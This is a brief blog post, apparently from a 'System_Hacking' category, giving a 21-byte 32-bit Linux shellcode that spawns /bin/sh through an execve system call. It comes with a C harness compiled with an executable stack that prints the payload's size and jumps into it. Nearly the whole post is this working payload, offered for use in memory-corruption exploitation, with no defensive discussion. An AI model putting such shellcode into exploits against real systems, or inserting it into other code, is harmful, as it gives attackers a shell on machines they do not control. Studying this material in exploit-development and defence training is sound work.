System_Hacking
32bit linux shellcode (/bin/sh)
k1rha
2016. 5. 17. 10:23
#gcc -o shellcode shellcode.c -m32 -z execstack
#include<string.h> char shellcode[]="\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"; int main(){ int (*func)(); printf ("size : %d \n",strlen(shellcode)); func = shellcode; func(); return 0; }
|